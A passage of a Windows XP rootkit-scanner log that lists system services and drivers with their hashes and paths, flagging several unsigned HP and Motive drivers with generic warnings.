08:08:46.0468 2240 Cdrom - ok
08:08:46.0484 2240 Changer - ok
08:08:46.0515 2240 [ 1CFE720EB8D93A7158A4EBC3AB178BDE ] CiSvc C:\WINDOWS\system32\cisvc.exe
08:08:46.0687 2240 CiSvc - ok
08:08:46.0718 2240 [ 34CBE729F38138217F9C80212A2A0C82 ] ClipSrv C:\WINDOWS\system32\clipsrv.exe
08:08:46.0875 2240 ClipSrv - ok
08:08:46.0937 2240 [ D87ACAED61E417BBA546CED5E7E36D9C ] clr_optimization_v2.0.50727_32 C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
08:08:47.0031 2240 clr_optimization_v2.0.50727_32 - ok
08:08:47.0046 2240 CmdIde - ok
08:08:47.0046 2240 COMSysApp - ok
08:08:47.0078 2240 Cpqarray - ok
08:08:47.0125 2240 [ 3D4E199942E29207970E04315D02AD3B ] CryptSvc C:\WINDOWS\System32\cryptsvc.dll
08:08:47.0296 2240 CryptSvc - ok
08:08:47.0296 2240 dac2w2k - ok
08:08:47.0312 2240 dac960nt - ok
08:08:47.0359 2240 [ 6B27A5C03DFB94B4245739065431322C ] DcomLaunch C:\WINDOWS\system32\rpcss.dll
08:08:47.0484 2240 DcomLaunch - ok
08:08:47.0578 2240 [ 5E38D7684A49CACFB752B046357E0589 ] Dhcp C:\WINDOWS\System32\dhcpcsvc.dll
08:08:47.0765 2240 Dhcp - ok
08:08:47.0796 2240 [ 044452051F3E02E7963599FC8F4F3E25 ] Disk C:\WINDOWS\system32\DRIVERS\disk.sys
08:08:47.0968 2240 Disk - ok
08:08:47.0984 2240 dmadmin - ok
08:08:48.0031 2240 [ D992FE1274BDE0F84AD826ACAE022A41 ] dmboot C:\WINDOWS\system32\drivers\dmboot.sys
08:08:48.0234 2240 dmboot - ok
08:08:48.0250 2240 [ 7C824CF7BBDE77D95C08005717A95F6F ] dmio C:\WINDOWS\system32\drivers\dmio.sys
08:08:48.0406 2240 dmio - ok
08:08:48.0453 2240 [ E9317282A63CA4D188C0DF5E09C6AC5F ] dmload C:\WINDOWS\system32\drivers\dmload.sys
08:08:48.0593 2240 dmload - ok
08:08:48.0625 2240 [ 57EDEC2E5F59F0335E92F35184BC8631 ] dmserver C:\WINDOWS\System32\dmserver.dll
08:08:48.0796 2240 dmserver - ok
08:08:48.0843 2240 [ 8A208DFCF89792A484E76C40E5F50B45 ] DMusic C:\WINDOWS\system32\drivers\DMusic.sys
08:08:49.0000 2240 DMusic - ok
08:08:49.0031 2240 [ 5F7E24FA9EAB896051FFB87F840730D2 ] Dnscache C:\WINDOWS\System32\dnsrslvr.dll
08:08:49.0093 2240 Dnscache - ok
08:08:49.0125 2240 [ 0F0F6E687E5E15579EF4DA8DD6945814 ] Dot3svc C:\WINDOWS\System32\dot3svc.dll
08:08:49.0296 2240 Dot3svc - ok
08:08:49.0296 2240 dpti2o - ok
08:08:49.0328 2240 [ 8F5FCFF8E8848AFAC920905FBD9D33C8 ] drmkaud C:\WINDOWS\system32\drivers\drmkaud.sys
08:08:49.0484 2240 drmkaud - ok
08:08:49.0500 2240 [ 2187855A7703ADEF0CEF9EE4285182CC ] EapHost C:\WINDOWS\System32\eapsvc.dll
08:08:49.0671 2240 EapHost - ok
08:08:49.0718 2240 [ BC93B4A066477954555966D77FEC9ECB ] ERSvc C:\WINDOWS\System32\ersvc.dll
08:08:49.0875 2240 ERSvc - ok
08:08:49.0921 2240 [ 38008FAAA9632C2EF8E98BF1614D0527 ] eusk2par C:\WINDOWS\system32\Drivers\eusk2par.sys
08:08:49.0953 2240 eusk2par - ok
08:08:49.0984 2240 [ 65DF52F5B8B6E9BBD183505225C37315 ] Eventlog C:\WINDOWS\system32\services.exe
08:08:50.0031 2240 Eventlog - ok
08:08:50.0078 2240 [ D4991D98F2DB73C60D042F1AEF79EFAE ] EventSystem C:\WINDOWS\System32\es.dll
08:08:50.0156 2240 EventSystem - ok
08:08:50.0203 2240 [ 38D332A6D56AF32635675F132548343E ] Fastfat C:\WINDOWS\system32\drivers\Fastfat.sys
08:08:50.0359 2240 Fastfat - ok
08:08:50.0375 2240 [ 1E580770BDECE924494B368AC980749E ] fasttx2k C:\WINDOWS\system32\DRIVERS\fasttx2k.sys
08:08:50.0421 2240 fasttx2k - ok
08:08:50.0468 2240 [ 99BC0B50F511924348BE19C7C7313BBF ] FastUserSwitchingCompatibility C:\WINDOWS\System32\shsvcs.dll
08:08:50.0546 2240 FastUserSwitchingCompatibility - ok
08:08:50.0578 2240 [ E97D6A8684466DF94FF3BC24FB787A07 ] Fax C:\WINDOWS\system32\fxssvc.exe
08:08:50.0750 2240 Fax - ok
08:08:50.0781 2240 [ 92CDD60B6730B9F50F6A1A0C1F8CDC81 ] Fdc C:\WINDOWS\system32\DRIVERS\fdc.sys
08:08:50.0953 2240 Fdc - ok
08:08:50.0968 2240 [ D45926117EB9FA946A6AF572FBE1CAA3 ] Fips C:\WINDOWS\system32\drivers\Fips.sys
08:08:51.0109 2240 Fips - ok
08:08:51.0140 2240 [ 9D27E7B80BFCDF1CDD9B555862D5E7F0 ] Flpydisk C:\WINDOWS\system32\DRIVERS\flpydisk.sys
08:08:51.0281 2240 Flpydisk - ok
08:08:51.0328 2240 [ B2CF4B0786F8212CB92ED2B50C6DB6B0 ] FltMgr C:\WINDOWS\system32\drivers\fltmgr.sys
08:08:51.0484 2240 FltMgr - ok
08:08:51.0562 2240 [ 8BA7C024070F2B7FDD98ED8A4BA41789 ] FontCache3.0.0.0 c:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
08:08:51.0578 2240 FontCache3.0.0.0 - ok
08:08:51.0625 2240 [ 3E1E2BD4F39B0E2B7DC4F4D2BCC2779A ] Fs_Rec C:\WINDOWS\system32\drivers\Fs_Rec.sys
08:08:51.0781 2240 Fs_Rec - ok
08:08:51.0828 2240 [ 6AC26732762483366C3969C9E4D2259D ] Ftdisk C:\WINDOWS\system32\DRIVERS\ftdisk.sys
08:08:51.0984 2240 Ftdisk - ok
08:08:52.0062 2240 [ AB8A6A87D9D7255C3884D5B9541A6E80 ] GEARAspiWDM C:\WINDOWS\system32\Drivers\GEARAspiWDM.sys
08:08:52.0093 2240 GEARAspiWDM - ok
08:08:52.0187 2240 [ 0A02C63C8B144BD8C86B103DEE7C86A2 ] Gpc C:\WINDOWS\system32\DRIVERS\msgpc.sys
08:08:52.0359 2240 Gpc - ok
08:08:52.0468 2240 [ 506708142BC63DABA64F2D3AD1DCD5BF ] gupdate C:\Program Files\Google\Update\GoogleUpdate.exe
08:08:52.0500 2240 gupdate - ok
08:08:52.0515 2240 [ 506708142BC63DABA64F2D3AD1DCD5BF ] gupdatem C:\Program Files\Google\Update\GoogleUpdate.exe
08:08:52.0531 2240 gupdatem - ok
08:08:52.0562 2240 [ 573C7D0A32852B48F3058CFD8026F511 ] HDAudBus C:\WINDOWS\system32\DRIVERS\HDAudBus.sys
08:08:52.0734 2240 HDAudBus - ok
08:08:52.0812 2240 [ 4FCCA060DFE0C51A09DD5C3843888BCD ] helpsvc C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll
08:08:52.0968 2240 helpsvc - ok
08:08:52.0968 2240 HidServ - ok
08:08:53.0015 2240 [ CCF82C5EC8A7326C3066DE870C06DAF1 ] HidUsb C:\WINDOWS\system32\DRIVERS\hidusb.sys
08:08:53.0156 2240 HidUsb - ok
08:08:53.0187 2240 [ 8878BD685E490239777BFE51320B88E9 ] hkmsvc C:\WINDOWS\System32\kmsvc.dll
08:08:53.0359 2240 hkmsvc - ok
08:08:53.0375 2240 hpn - ok
08:08:53.0484 2240 [ CE0FCEC4D4D860F36D972759B11EAF0F ] hpqcxs08 C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll
08:08:53.0531 2240 hpqcxs08 ( UnsignedFile.Multi.Generic ) - warning
08:08:53.0531 2240 hpqcxs08 - detected UnsignedFile.Multi.Generic (1)
08:08:53.0546 2240 [ EE4C7A4CF2316701FFDE90F404520265 ] hpqddsvc C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll
08:08:53.0562 2240 hpqddsvc ( UnsignedFile.Multi.Generic ) - warning
08:08:53.0562 2240 hpqddsvc - detected UnsignedFile.Multi.Generic (1)
08:08:53.0609 2240 [ 5FABA4775D4C61E55EC669D643FFC71F ] HPZid412 C:\WINDOWS\system32\DRIVERS\HPZid412.sys
08:08:53.0718 2240 HPZid412 - ok
08:08:53.0734 2240 [ A3C43980EE1F1BEAC778B44EA65DBDD4 ] HPZipr12 C:\WINDOWS\system32\DRIVERS\HPZipr12.sys
08:08:53.0796 2240 HPZipr12 - ok
08:08:53.0812 2240 [ 2906949BD4E206F2BB0DD1896CE9F66F ] HPZius12 C:\WINDOWS\system32\DRIVERS\HPZius12.sys
08:08:53.0906 2240 HPZius12 - ok
08:08:53.0953 2240 [ F80A415EF82CD06FFAF0D971528EAD38 ] HTTP C:\WINDOWS\system32\Drivers\HTTP.sys
08:08:54.0000 2240 HTTP - ok
08:08:54.0031 2240 [ 6100A808600F44D999CEBDEF8841C7A3 ] HTTPFilter C:\WINDOWS\System32\w3ssl.dll
08:08:54.0203 2240 HTTPFilter - ok
08:08:54.0218 2240 i2omgmt - ok
08:08:54.0218 2240 i2omp - ok
08:08:54.0281 2240 [ 4A0B06AA8943C1E332520F7440C0AA30 ] i8042prt C:\WINDOWS\system32\DRIVERS\i8042prt.sys
08:08:54.0437 2240 i8042prt - ok
08:08:54.0640 2240 [ 0ACEBB31989CBF9A5663FE4A33D28D21 ] ialm C:\WINDOWS\system32\DRIVERS\ialmnt5.sys
08:08:55.0031 2240 ialm - ok
08:08:55.0125 2240 [ C01AC32DC5C03076CFB852CB5DA5229C ] idsvc C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
08:08:55.0203 2240 idsvc - ok
08:08:55.0234 2240 [ 083A052659F5310DD8B6A6CB05EDCF8E ] Imapi C:\WINDOWS\system32\DRIVERS\imapi.sys
08:08:55.0406 2240 Imapi - ok
08:08:55.0453 2240 [ 30DEAF54A9755BB8546168CFE8A6B5E1 ] ImapiService C:\WINDOWS\system32\imapi.exe
08:08:55.0625 2240 ImapiService - ok
08:08:55.0625 2240 ini910u - ok
08:08:55.0734 2240 [ D383CEF6C0EF6DCAC644E2B954F2C202 ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RtkHDAud.sys
08:08:55.0906 2240 IntcAzAudAddService - ok
08:08:55.0921 2240 [ B5466A9250342A7AA0CD1FBA13420678 ] IntelIde C:\WINDOWS\system32\DRIVERS\intelide.sys
08:08:56.0078 2240 IntelIde - ok
08:08:56.0140 2240 [ 8C953733D8F36EB2133F5BB58808B66B ] intelppm C:\WINDOWS\system32\DRIVERS\intelppm.sys
08:08:56.0312 2240 intelppm - ok
08:08:56.0343 2240 [ 3BB22519A194418D5FEC05D800A19AD0 ] ip6fw C:\WINDOWS\system32\drivers\ip6fw.sys
08:08:56.0500 2240 ip6fw - ok
08:08:56.0515 2240 [ 731F22BA402EE4B62748ADAF6363C182 ] IpFilterDriver C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
08:08:56.0687 2240 IpFilterDriver - ok
08:08:56.0718 2240 [ B87AB476DCF76E72010632B5550955F5 ] IpInIp C:\WINDOWS\system32\DRIVERS\ipinip.sys
08:08:56.0875 2240 IpInIp - ok
08:08:56.0890 2240 [ CC748EA12C6EFFDE940EE98098BF96BB ] IpNat C:\WINDOWS\system32\DRIVERS\ipnat.sys
08:08:57.0046 2240 IpNat - ok
08:08:57.0343 2240 [ 62937A89470AF8FF172F0980CA8AEFC9 ] iPod Service C:\Program Files\iPod\bin\iPodService.exe
08:08:57.0640 2240 iPod Service - ok
08:08:57.0734 2240 [ 23C74D75E36E7158768DD63D92789A91 ] IPSec C:\WINDOWS\system32\DRIVERS\ipsec.sys
08:08:57.0937 2240 IPSec - ok
08:08:57.0968 2240 [ C93C9FF7B04D772627A3646D89F7BF89 ] IRENUM C:\WINDOWS\system32\DRIVERS\irenum.sys
08:08:58.0062 2240 IRENUM - ok
08:08:58.0078 2240 [ 05A299EC56E52649B1CF2FC52D20F2D7 ] isapnp C:\WINDOWS\system32\DRIVERS\isapnp.sys
08:08:58.0250 2240 isapnp - ok
08:08:58.0296 2240 [ F59C3569A2F2C464BB78CB1BDCDCA55E ] Iviaspi C:\WINDOWS\system32\drivers\iviaspi.sys
08:08:58.0296 2240 Iviaspi ( UnsignedFile.Multi.Generic ) - warning
08:08:58.0296 2240 Iviaspi - detected UnsignedFile.Multi.Generic (1)
08:08:58.0406 2240 [ 32192B4EBE8720ED8D49A455C962CB91 ] JavaQuickStarterService C:\Program Files\Java\jre6\bin\jqs.exe
08:08:58.0437 2240 JavaQuickStarterService - ok
08:08:58.0437 2240 [ 463C1EC80CD17420A542B7F36A36F128 ] Kbdclass C:\WINDOWS\system32\DRIVERS\kbdclass.sys
08:08:58.0609 2240 Kbdclass - ok
08:08:58.0656 2240 [ 692BCF44383D056AED41B045A323D378 ] kmixer C:\WINDOWS\system32\drivers\kmixer.sys
08:08:58.0812 2240 kmixer - ok
08:08:58.0859 2240 [ B467646C54CC746128904E1654C750C1 ] KSecDD C:\WINDOWS\system32\drivers\KSecDD.sys
08:08:58.0937 2240 KSecDD - ok
08:08:58.0968 2240 [ 4103DBB6CAA85E40D271C1AD12BBF776 ] L8042pr2 C:\WINDOWS\system32\DRIVERS\L8042pr2.Sys
08:08:59.0015 2240 L8042pr2 - ok
08:08:59.0062 2240 [ 3A7C3CBE5D96B8AE96CE81F0B22FB527 ] lanmanserver C:\WINDOWS\System32\srvsvc.dll
08:08:59.0109 2240 lanmanserver - ok
08:08:59.0140 2240 [ A8888A5327621856C0CEC4E385F69309 ] lanmanworkstation C:\WINDOWS\System32\wkssvc.dll
08:08:59.0218 2240 lanmanworkstation - ok
08:08:59.0234 2240 lbrtfdc - ok
08:08:59.0281 2240 [ A7DB739AE99A796D91580147E919CC59 ] LmHosts C:\WINDOWS\System32\lmhsvc.dll
08:08:59.0437 2240 LmHosts - ok
08:08:59.0468 2240 [ B666F835C18974F392A387C6E863072F ] LMouFlt2 C:\WINDOWS\system32\DRIVERS\LMouFlt2.Sys
08:08:59.0500 2240 LMouFlt2 - ok
08:08:59.0593 2240 [ E6CB119EF2E148EAA1A247343550756E ] McciCMService C:\Program Files\Common Files\Motive\McciCMService.exe
08:08:59.0609 2240 McciCMService ( UnsignedFile.Multi.Generic ) - warning
08:08:59.0609 2240 McciCMService - detected UnsignedFile.Multi.Generic (1)
08:08:59.0640 2240 [ 986B1FF5814366D71E0AC5755C88F2D3 ] Messenger C:\WINDOWS\System32\msgsvc.dll
08:08:59.0828 2240 Messenger - ok
08:08:59.0906 2240 [ 4AE068242760A1FB6E1A44BF4E16AFA6 ] mnmdd C:\WINDOWS\system32\drivers\mnmdd.sys
08:09:00.0093 2240 mnmdd - ok
08:09:00.0203 2240 [ D18F1F0C101D06A1C1ADF26EED16FCDD ] mnmsrvc C:\WINDOWS\System32\mnmsrvc.exe
08:09:00.0390 2240 mnmsrvc - ok
08:09:00.0437 2240 [ DFCBAD3CEC1C5F964962AE10E0BCC8E1 ] Modem C:\WINDOWS\system32\drivers\Modem.sys
08:09:00.0625 2240 Modem - ok
08:09:00.0640 2240 [ 35C9E97194C8CFB8430125F8DBC34D04 ] Mouclass C:\WINDOWS\system32\DRIVERS\mouclass.sys
08:09:00.0796 2240 Mouclass - ok
08:09:00.0843 2240 [ B1C303E17FB9D46E87A98E4BA6769685 ] mouhid C:\WINDOWS\system32\DRIVERS\mouhid.sys
08:09:01.0000 2240 mouhid - ok
08:09:01.0015 2240 [ A80B9A0BAD1B73637DBCBBA7DF72D3FD ] MountMgr C:\WINDOWS\system32\drivers\MountMgr.sys
08:09:01.0187 2240 MountMgr - ok
08:09:01.0250 2240 [ 730A519505621DF46BCBF9CDAC9FB6AD ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
08:09:01.0281 2240 MozillaMaintenance - ok
08:09:01.0312 2240 MpKsl08115bda - ok
08:09:01.0312 2240 mraid35x - ok
08:09:01.0343 2240 [ 9BD4DCB5412921864A7AACDEDFBD1923 ] MREMP50 C:\PROGRA~1\COMMON~1\Motive\MREMP50.SYS
08:09:01.0359 2240 MREMP50 ( UnsignedFile.Multi.Generic ) - warning
08:09:01.0359 2240 MREMP50 - detected UnsignedFile.Multi.Generic (1)
08:09:01.0406 2240 [ 2BC9E43F55DE8C30FC817ED56D0EE907 ] MREMPR5 C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS
08:09:01.0421 2240 MREMPR5 ( UnsignedFile.Multi.Generic ) - warning
08:09:01.0421 2240 MREMPR5 - detected UnsignedFile.Multi.Generic (1)
08:09:01.0453 2240 [ 594B9D8194E3F4ECBF0325BD10BBEB05 ] MRENDIS5 C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS
08:09:01.0468 2240 MRENDIS5 ( UnsignedFile.Multi.Generic ) - warning
08:09:01.0468 2240 MRENDIS5 - detected UnsignedFile.Multi.Generic (1)
08:09:01.0515 2240 [ 07C02C892E8E1A72D6BF35004F0E9C5E ] MRESP50 C:\PROGRA~1\COMMON~1\Motive\MRESP50.SYS
08:09:01.0515 2240 MRESP50 ( UnsignedFile.Multi.Generic ) - warning
08:09:01.0515 2240 MRESP50 - detected UnsignedFile.Multi.Generic (1)
08:09:01.0531 2240 mrtRate - ok
08:09:01.0562 2240 [ 11D42BB6206F33FBB3BA0288D3EF81BD ] MRxDAV C:\WINDOWS\system32\DRIVERS\mrxdav.sys
08:09:01.0718 2240 MRxDAV - ok
08:09:01.0765 2240 [ 7D304A5EB4344EBEEAB53A2FE3FFB9F0 ] MRxSmb C:\WINDOWS\system32\DRIVERS\mrxsmb.sys
08:09:01.0828 2240 MRxSmb - ok
08:09:01.0859 2240 [ A137F1470499A205ABBB9AAFB3B6F2B1 ] MSDTC C:\WINDOWS\System32\msdtc.exe
08:09:02.0046 2240 MSDTC - ok
08:09:02.0062 2240 [ C941EA2454BA8350021D774DAF0F1027 ] Msfs C:\WINDOWS\system32\drivers\Msfs.sys
08:09:02.0218 2240 Msfs - ok
08:09:02.0218 2240 MSIServer - ok
08:09:02.0234 2240 [ D1575E71568F4D9E14CA56B7B0453BF1 ] MSKSSRV C:\WINDOWS\system32\drivers\MSKSSRV.sys
08:09:02.0406 2240 MSKSSRV - ok
08:09:02.0437 2240 [ 325BB26842FC7CCC1FCCE2C457317F3E ] MSPCLOCK C:\WINDOWS\system32\drivers\MSPCLOCK.sys
08:09:02.0625 2240 MSPCLOCK - ok
08:09:02.0625 2240 [ BAD59648BA099DA4A17680B39730CB3D ] MSPQM C:\WINDOWS\system32\drivers\MSPQM.sys
08:09:02.0812 2240 MSPQM - ok
08:09:02.0828 2240 [ AF5F4F3F14A8EA2C26DE30F7A1E17136 ] mssmbios C:\WINDOWS\system32\DRIVERS\mssmbios.sys
08:09:02.0968 2240 mssmbios - ok
08:09:03.0015 2240 [ DE6A75F5C270E756C5508D94B6CF68F5 ] Mup C:\WINDOWS\system32\drivers\Mup.sys
08:09:03.0046 2240 Mup - ok
08:09:03.0093 2240 [ 0102140028FAD045756796E1C685D695 ] napagent C:\WINDOWS\System32\qagentrt.dll
08:09:03.0265 2240 napagent - ok
08:09:03.0312 2240 [ 1DF7F42665C94B825322FAE71721130D ] NDIS C:\WINDOWS\system32\drivers\NDIS.sys
08:09:03.0468 2240 NDIS - ok
08:09:03.0515 2240 [ 0109C4F3850DFBAB279542515386AE22 ] NdisTapi C:\WINDOWS\system32\DRIVERS\ndistapi.sys
08:09:03.0546 2240 NdisTapi - ok
08:09:03.0593 2240 [ F927A4434C5028758A842943EF1A3849 ] Ndisuio C:\WINDOWS\system32\DRIVERS\ndisuio.sys
08:09:03.0750 2240 Ndisuio - ok
08:09:03.0765 2240 [ EDC1531A49C80614B2CFDA43CA8659AB ] NdisWan C:\WINDOWS\system32\DRIVERS\ndiswan.sys
08:09:03.0921 2240 NdisWan - ok
08:09:03.0953 2240 [ 9282BD12DFB069D3889EB3FCC1000A9B ] NDProxy C:\WINDOWS\system32\drivers\NDProxy.sys
08:09:04.0031 2240 NDProxy - ok
08:09:04.0062 2240 [ 2969D26EEE289BE7422AA46FC55F4E38 ] Net Driver HPZ12 C:\WINDOWS\system32\HPZinw12.dll
08:09:04.0093 2240 Net Driver HPZ12 ( UnsignedFile.Multi.Generic ) - warning
08:09:04.0093 2240 Net Driver HPZ12 - detected UnsignedFile.Multi.Generic (1)
08:09:04.0125 2240 [ 5D81CF9A2F1A3A756B66CF684911CDF0 ] NetBIOS C:\WINDOWS\system32\DRIVERS\netbios.sys
08:09:04.0296 2240 NetBIOS - ok
08:09:04.0312 2240 [ 74B2B2F5BEA5E9A3DC021D685551BD3D ] NetBT C:\WINDOWS\system32\DRIVERS\netbt.sys
08:09:04.0468 2240 NetBT - ok
08:09:04.0500 2240 [ B857BA82860D7FF85AE29B095645563B ] NetDDE C:\WINDOWS\system32\netdde.exe
08:09:04.0687 2240 NetDDE - ok
08:09:04.0703 2240 [ B857BA82860D7FF85AE29B095645563B ] NetDDEdsdm C:\WINDOWS\system32\netdde.exe
08:09:04.0859 2240 NetDDEdsdm - ok
08:09:04.0906 2240 [ BF2466B3E18E970D8A976FB95FC1CA85 ] Netlogon C:\WINDOWS\system32\lsass.exe
08:09:05.0078 2240 Netlogon - ok
08:09:05.0109 2240 [ 13E67B55B3ABD7BF3FE7AAE5A0F9A9DE ] Netman C:\WINDOWS\System32\netman.dll
08:09:05.0281 2240 Netman - ok
08:09:05.0312 2240 [ D34612C5D02D026535B3095D620626AE ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
08:09:05.0343 2240 NetTcpPortSharing - ok
08:09:05.0359 2240 [ E9E47CFB2D461FA0FC75B7A74C6383EA ] NIC1394 C:\WINDOWS\system32\DRIVERS\nic1394.sys
08:09:05.0531 2240 NIC1394 - ok
08:09:05.0562 2240 [ 943337D786A56729263071623BBB9DE5 ] Nla C:\WINDOWS\System32\mswsock.dll
08:09:05.0609 2240 Nla - ok
08:09:05.0656 2240 [ 3182D64AE053D6FB034F44B6DEF8034A ] Npfs C:\WINDOWS\system32\drivers\Npfs.sys
08:09:05.0812 2240 Npfs - ok
08:09:05.0828 2240 [ 78A08DD6A8D65E697C18E1DB01C5CDCA ] Ntfs C:\WINDOWS\system32\drivers\Ntfs.sys
08:09:06.0000 2240 Ntfs - ok
08:09:06.0015 2240 [ BF2466B3E18E970D8A976FB95FC1CA85 ] NtLmSsp C:\WINDOWS\System32\lsass.exe
08:09:06.0171 2240 NtLmSsp - ok
08:09:06.0218 2240 [ 156F64A3345BD23C600655FB4D10BC08 ] NtmsSvc C:\WINDOWS\system32\ntmssvc.dll
08:09:06.0390 2240 NtmsSvc - ok
08:09:06.0437 2240 [ 73C1E1F395918BC2C6DD67AF7591A3AD ] Null C:\WINDOWS\system32\drivers\Null.sys
08:09:06.0593 2240 Null - ok
08:09:06.0640 2240 [ B305F3FAD35083837EF46A0BBCE2FC57 ] NwlnkFlt C:\WINDOWS\system32\DRIVERS\nwlnkflt.sys
08:09:06.0796 2240 NwlnkFlt - ok
08:09:06.0812 2240 [ C99B3415198D1AAB7227F2C88FD664B9 ] NwlnkFwd C:\WINDOWS\system32\DRIVERS\nwlnkfwd.sys
08:09:06.0984 2240 NwlnkFwd - ok
08:09:07.0031 2240 [ CA33832DF41AFB202EE7AEB05145922F ] ohci1394 C:\WINDOWS\system32\DRIVERS\ohci1394.sys
08:09:07.0187 2240 ohci1394 - ok
08:09:07.0281 2240 [ 7A56CF3E3F12E8AF599963B16F50FB6A ] ose C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
08:09:07.0296 2240 ose - ok
08:09:07.0328 2240 [ 5575FAF8F97CE5E713D108C2A58D7C7C ] Parport C:\WINDOWS\system32\DRIVERS\parport.sys
08:09:07.0484 2240 Parport - ok
08:09:07.0515 2240 [ BEB3BA25197665D82EC7065B724171C6 ] PartMgr C:\WINDOWS\system32\drivers\PartMgr.sys
08:09:07.0656 2240 PartMgr - ok
08:09:07.0703 2240 [ 70E98B3FD8E963A6A46A2E6247E0BEA1 ] ParVdm C:\WINDOWS\system32\drivers\ParVdm.sys
08:09:07.0875 2240 ParVdm - ok
08:09:07.0906 2240 [ A219903CCF74233761D92BEF471A07B1 ] PCI C:\WINDOWS\system32\DRIVERS\pci.sys
08:09:08.0062 2240 PCI - ok
08:09:08.0078 2240 PCIDump - ok
08:09:08.0093 2240 [ CCF5F451BB1A5A2A522A76E670000FF0 ] PCIIde C:\WINDOWS\system32\DRIVERS\pciide.sys
08:09:08.0250 2240 PCIIde - ok
08:09:08.0265 2240 [ 9E89EF60E9EE05E3F2EEF2DA7397F1C1 ] Pcmcia C:\WINDOWS\system32\drivers\Pcmcia.sys
08:09:08.0437 2240 Pcmcia - ok
08:09:08.0453 2240 PDCOMP - ok
08:09:08.0453 2240 PDFRAME - ok
08:09:08.0468 2240 PDRELI - ok
08:09:08.0484 2240 PDRFRAME - ok
08:09:08.0484 2240 perc2 - ok
08:09:08.0500 2240 perc2hib - ok
08:09:08.0546 2240 [ 444F122E68DB44C0589227781F3C8B3F ] Pfc C:\WINDOWS\system32\drivers\pfc.sys
08:09:08.0546 2240 Pfc ( UnsignedFile.Multi.Generic ) - warning
08:09:08.0546 2240 Pfc - detected UnsignedFile.Multi.Generic (1)
08:09:08.0578 2240 [ 65DF52F5B8B6E9BBD183505225C37315 ] PlugPlay C:\WINDOWS\system32\services.exe
08:09:08.0609 2240 PlugPlay - ok
08:09:08.0625 2240 [ BAFC9706BDF425A02B66468AB2605C59 ] Pml Driver HPZ12 C:\WINDOWS\system32\HPZipm12.dll
08:09:08.0656 2240 Pml Driver HPZ12 ( UnsignedFile.Multi.Generic ) - warning
08:09:08.0656 2240 Pml Driver HPZ12 - detected UnsignedFile.Multi.Generic (1)
08:09:08.0656 2240 [ BF2466B3E18E970D8A976FB95FC1CA85 ] PolicyAgent C:\WINDOWS\system32\lsass.exe
08:09:08.0812 2240 PolicyAgent - ok
08:09:08.0859 2240 [ EFEEC01B1D3CF84F16DDD24D9D9D8F99 ] PptpMiniport C:\WINDOWS\system32\DRIVERS\raspptp.sys
08:09:09.0015 2240 PptpMiniport - ok
08:09:09.0062 2240 [ A32BEBAF723557681BFC6BD93E98BD26 ] Processor C:\WINDOWS\system32\DRIVERS\processr.sys
08:09:09.0234 2240 Processor - ok
08:09:09.0250 2240 [ BF2466B3E18E970D8A976FB95FC1CA85 ] ProtectedStorage C:\WINDOWS\system32\lsass.exe
08:09:09.0390 2240 ProtectedStorage - ok
08:09:09.0421 2240 [ 390C204CED3785609AB24E9C52054A84 ] Ps2 C:\WINDOWS\system32\DRIVERS\PS2.sys
08:09:09.0484 2240 Ps2 - ok
08:09:09.0515 2240 [ 09298EC810B07E5D582CB3A3F9255424 ] PSched C:\WINDOWS\system32\DRIVERS\psched.sys
08:09:09.0687 2240 PSched - ok
08:09:09.0718 2240 [ 80D317BD1C3DBC5D4FE7B1678C60CADD ] Ptilink C:\WINDOWS\system32\DRIVERS\ptilink.sys
08:09:09.0859 2240 Ptilink - ok
08:09:09.0906 2240 [ E42E3433DBB4CFFE8FDD91EAB29AEA8E ] PxHelp20 C:\WINDOWS\system32\DRIVERS\PxHelp20.sys
08:09:09.0921 2240 PxHelp20 - ok
08:09:09.0937 2240 ql1080 - ok
08:09:09.0953 2240 Ql10wnt - ok
08:09:09.0953 2240 ql12160 - ok
08:09:09.0968 2240 ql1240 - ok
08:09:09.0984 2240 ql1280 - ok
08:09:10.0015 2240 [ FE0D99D6F31E4FAD8159F690D68DED9C ] RasAcd C:\WINDOWS\system32\DRIVERS\rasacd.sys
08:09:10.0171 2240 RasAcd - ok
08:09:10.0203 2240 [ AD188BE7BDF94E8DF4CA0A55C00A5073 ] RasAuto C:\WINDOWS\System32\rasauto.dll
08:09:10.0375 2240 RasAuto - ok
08:09:10.0406 2240 [ 11B4A627BC9614B885C4969BFA5FF8A6 ] Rasl2tp C:\WINDOWS\system32\DRIVERS\rasl2tp.sys
08:09:10.0546 2240 Rasl2tp - ok
08:09:10.0578 2240 [ 76A9A3CBEADD68CC57CDA5E1D7448235 ] RasMan C:\WINDOWS\System32\rasmans.dll
08:09:10.0750 2240 RasMan - ok
08:09:10.0765 2240 [ 5BC962F2654137C9909C3D4603587DEE ] RasPppoe C:\WINDOWS\system32\DRIVERS\raspppoe.sys
08:09:10.0921 2240 RasPppoe - ok
08:09:10.0953 2240 [ FDBB1D60066FCFBB7452FD8F9829B242 ] Raspti C:\WINDOWS\system32\DRIVERS\raspti.sys
08:09:11.0109 2240 Raspti - ok
08:09:11.0125 2240 [ 7AD224AD1A1437FE28D89CF22B17780A ] Rdbss C:\WINDOWS\system32\DRIVERS\rdbss.sys
08:09:11.0281 2240 Rdbss - ok
08:09:11.0328 2240 [ 4912D5B403614CE99C28420F75353332 ] RDPCDD C:\WINDOWS\system32\DRIVERS\RDPCDD.sys
08:09:11.0484 2240 RDPCDD - ok
08:09:11.0531 2240 [ 43AF5212BD8FB5BA6EED9754358BD8F7 ] RDPWD C:\WINDOWS\system32\drivers\RDPWD.sys
08:09:11.0593 2240 RDPWD - ok
08:09:11.0625 2240 [ 3C37BF86641BDA977C3BF8A840F3B7FA ] RDSessMgr C:\WINDOWS\system32\sessmgr.exe
08:09:11.0781 2240 RDSessMgr - ok
